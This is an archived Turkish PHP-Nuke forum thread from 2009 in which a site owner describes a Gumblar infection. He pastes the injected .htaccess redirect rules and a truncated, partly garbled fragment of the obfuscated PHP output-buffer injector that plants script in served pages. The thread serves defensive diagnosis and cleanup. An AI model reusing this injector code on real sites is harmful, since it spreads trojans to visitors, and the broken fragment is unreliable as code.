BU SİTE PHP-NUKE SONLANINCA KAPANDI. İÇİNDE EMEK OLDUĞUNDAN AÇIK TUTULMAKTADIR.
GÜNCEL İÇERİK BLOG SAYFASINDADIR!
Anasayfa FORUMLAR Üye Girişi Dosyalar Dersler İpuçları Yardımcı Araçlar Hakkımızda
KİMLER BAĞLI
Toplam Üye: 32638
Aktif Üye: 0
Aktif Ziyaretçi: 896
Üye Adı
Şifre
Beni Hatırla
          Yeni Üye KayıtYeni Üye Kayıt
          Şifremi UnuttumŞifremi Unuttum
FORUMLAR
 Nuke sentinelin sorgulama..
(5592 okuma, 0 yanıt)
 dizin CHMOD ları değişmiy..
(9136 okuma, 6 yanıt)
 3.3Patch Hakkında Versiyo..
(3936 okuma, 0 yanıt)
 nuke sentinel 2.6.01 kura..
(11206 okuma, 10 yanıt)
 Nuke Sentinel..
(5084 okuma, 2 yanıt)
 Nuke 8.0 Guvenlik..
(5636 okuma, 2 yanıt)
 Php Nuke 8.0 Güvenlik asa..
(4049 okuma, 0 yanıt)
 php nuke 8 kurdum güvenli..
(11717 okuma, 10 yanıt)
 Arkadaslar Lütfen Yardımc..
(10758 okuma, 9 yanıt)
 Site hacklendi sanırım.....
(6011 okuma, 2 yanıt)
 Hadi Protector Kuralım..
(46262 okuma, 45 yanıt)
 Bu bir saldırmı..
(9491 okuma, 7 yanıt)
 siteme virüs girmis..
(9553 okuma, 6 yanıt)
 Sitedekileri atmak..
(6055 okuma, 2 yanıt)
 Kötü botları engellemek...
(12883 okuma, 10 yanıt)
 2 dakika içinde 5 farklı ..
(8246 okuma, 5 yanıt)
 index atılamayan site yap..
(8183 okuma, 5 yanıt)
 Sanal Klavye Uygulamasi H..
(6189 okuma, 2 yanıt)
 js trojandownloader.agent..
(6584 okuma, 4 yanıt)
 Güvenlik konusunda yardım..
(8747 okuma, 8 yanıt)
 Sunucu firması websiteme ..
(5778 okuma, 2 yanıt)
 siteme saldirimi olmus?..
(6913 okuma, 4 yanıt)
 Protector bir işe yaramıy..
(16254 okuma, 15 yanıt)
 Nuke Sentinel 242 pl5 ( 7..
(30073 okuma, 25 yanıt)
 hacklendim mi?..
(6925 okuma, 4 yanıt)
 Güvenli prefix değiştirme..
(87083 okuma, 108 yanıt)
 7.6 ya 3.2 pack nasıl yap..
(5147 okuma, 1 yanıt)
 Site neden Google i banla..
(4792 okuma, 1 yanıt)
 PhpMyadminden toplu isim ..
(7264 okuma, 4 yanıt)
 sentinel güvenlik sistemi..
(8433 okuma, 6 yanıt)
 Sitemdeki Bu Acik Neyden ..
(8478 okuma, 6 yanıt)
 Saldırı yedim BW dolmuş. ..
(11487 okuma, 9 yanıt)
 sürümünüz < 7.8 ise s..
(8066 okuma, 5 yanıt)
 forum için kod yazma yasa..
(5739 okuma, 2 yanıt)
 Arkadaşlar hacklendim seb..
(5420 okuma, 2 yanıt)
 KENDİ TOLBARIMIMDAN AYDA ..
(6153 okuma, 3 yanıt)
 Bütün indexler değişmiş, ..
(5645 okuma, 3 yanıt)
 Çok sorulu, çok şıklı ank..
(3939 okuma, 0 yanıt)
 Protector' deki Host İs..
(3961 okuma, 0 yanıt)
 php nuke dosyaları şifrel..
(8676 okuma, 7 yanıt)
 index dosyasının chmod k..
(4705 okuma, 1 yanıt)
 AdminBox-1.0.3 Kurulumund..
(4167 okuma, 0 yanıt)
 gec saatlerde hızlanan tr..
(9086 okuma, 8 yanıt)
 Prefix değiştirmede coppe..
(5175 okuma, 1 yanıt)
 Nuke Güvenlik..
(181483 okuma, 257 yanıt)
 bütün index lere iframe e..
(22032 okuma, 24 yanıt)
 Nuke Sentinel Google bot ..
(6602 okuma, 4 yanıt)
 Siteme Sürekli Üye Oluyor..
(28188 okuma, 28 yanıt)
 Yeni iframe virüsler kodl..
(21965 okuma, 23 yanıt)
 Nuke Versiyonları Hakkın..
(4396 okuma, 0 yanıt)
Netopsiyon Online: Forums
Netopsiyon Online :: Başlık görüntüleniyor - Sİtenize virüs bulaşabilir!..
 AramaArama   RütbelerRütbeliler   ProfilProfil   GirişGiriş 


Sİtenize virüs bulaşabilir!..

 
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik
Önceki başlık :: Sonraki başlık  
Yazar Mesaj
karabey15
Mesaj: 1+
Mesaj: 1+





Kayıt: Mar 29, 2008
Mesajlar: 35

MesajTarih: 2009-06-01, 02:11:26    Mesaj konusu: Sİtenize virüs bulaşabilir!.. Alıntıyla Cevap Gönder

Siteme Gumblar adında bir virüs bulaştı. Tüm dosyaların içine bir kod atıyor ve siteyi müthiş yavaşlatıyor. Giren herkesin bilgisayarına da trojan atıyor. Nod32 bulmuyor bile, sadece kaspersky bulup siliyor bilgisayardan. Siteden ise tüm dosyaları tek tek temizleyerek kurtulabiliyorsunuz.

Eğer doğru teşhis edebilmişsem (ki ustalar daha iyi bilir) .htaccess içine şu kodları atıyor;
Kod:
RewriteEngine on
Options All
RewriteCond %{HTTP_HOST} ^.*$
RewriteRule ^index\.htm$ "http\:\/\/readme\.txt" [R=302


html dosyalarına da;
Kod:
<s><function></s>

bunu atıyor.

php dosyalarına ise;

Kod:
</s>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);}$s1=preg_replace('#<s><n></s>#','',$s);if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);elseif(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_lkojfghx');for($i=0;$i<count>


Tecrübemi paylaşmak istedim. Vede tek tek dosya temizlemeden toplu halde bu illetden kurtulmanın yolunu bilen varsa YARDIM bekliyorum. Çoook sevinirim.

KODLARI NETOPSİYON KIRPIYOR; KISACA
html içine jawascript atıyor.
php ye de karmakarışık bir kodla birlikte gene jawa atıyor.

Birde sanırım artık phpnuke den caymaya başladım. Phpfusion a mı geçsek.

..
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Bu Site Google Adsense ile Gelir Elde Ediyor









Tarih: 2025-09-03, 08:23:11    Mesaj konusu: Forum Arası Reklamlar


Başa dön
artistbaron
Mesaj: 1000+
Mesaj: 1000+





Kayıt: Dec 09, 2006
Mesajlar: 2993

MesajTarih: 2009-06-01, 04:03:39    Mesaj konusu: Alıntıyla Cevap Gönder

İframe virüs için birde buraya bakabilirsiniz.

http://www.saho.in/sitenize-i f r a m e-virusu-bulasirsa-temizlemeniz-icin-script/

İşe yarayabilir.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
karabey15
Mesaj: 1+
Mesaj: 1+





Kayıt: Mar 29, 2008
Mesajlar: 35

MesajTarih: 2009-06-01, 11:21:58    Mesaj konusu: Alıntıyla Cevap Gönder

artistbaron sağolasın. Denedim şimdi o linki. Ama hata veriyor; line 7 diyor.

Aslında script nasıl kullanılır onu bilmiyorum. Bu kodları tmz.php olarak kaydettim ana dizine attım ve çalıştırmayı denedim. Ama olmadı.
Başa dön
Kullanıcının profilini görüntüle Özel mesaj gönder
Önceki mesajları göster:   
Bu forum kilitlendi: mesaj gönderemez, cevap yazamaz ya da başlıkları değiştiremezsiniz   Bu başlık kilitlendi: mesajları değiştiremez ya da cevap yazamazsınız    Netopsiyon Online Forum Ana Sayfa -> Php-Nuke -> Php Nuke Güvenlik Tüm zamanlar GMT + 3 Saat
1. sayfa (Toplam 1 sayfa)

 
Geçiş Yap:  
Bu forumda yeni başlıklar açamazsınız
Bu forumdaki başlıklara cevap veremezsiniz
Bu forumdaki mesajlarınızı değiştiremezsiniz
Bu forumdaki mesajlarınızı silemezsiniz
Bu forumdaki anketlerde oy kullanamazsınız

Benzer Konular

Başlık Yazar Forum Cevaplar Tarih
Yeni mesaj yok Virüs ahmetx Php Nuke Sorunlarınız 1 2010-07-21, 11:52:37 Son Mesajı Görüntüle
Yeni mesaj yok siteme virüs girmis atakanxx Php Nuke Güvenlik 6 2010-02-16, 07:20:28 Son Mesajı Görüntüle
Yeni mesaj yok Yine virüs Girer mi ? denizcifcii Php Nuke Sorunlarınız 9 2009-09-16, 02:30:46 Son Mesajı Görüntüle
Yeni mesaj yok IFRAME Virüs Nasıl Bulaşır? denizcifcii Php Nuke Sorunlarınız 3 2009-09-14, 15:00:47 Son Mesajı Görüntüle
Yeni mesaj yok Bu Nedir Arkadaşlar Fikri Olan Var mı... KaRNeC_81 Php Nuke Sorunlarınız 2 2009-08-21, 15:20:47 Son Mesajı Görüntüle

Copyright © 2002-2025 Ali Osman KAHRAMAN - Bütün hakları saklıdır!
Bu site Netopsiyon.com.tr Sunucularında Barındırılmaktadır.
netopsiyon®, Ali Osman KAHRAMAN' a ait tescilli bir markadır. İzinsiz kullanılamaz!
Netopsiyon Bilişim Teknolojileri San. Tic. Ltd.Şti. Netopsiyon Copyright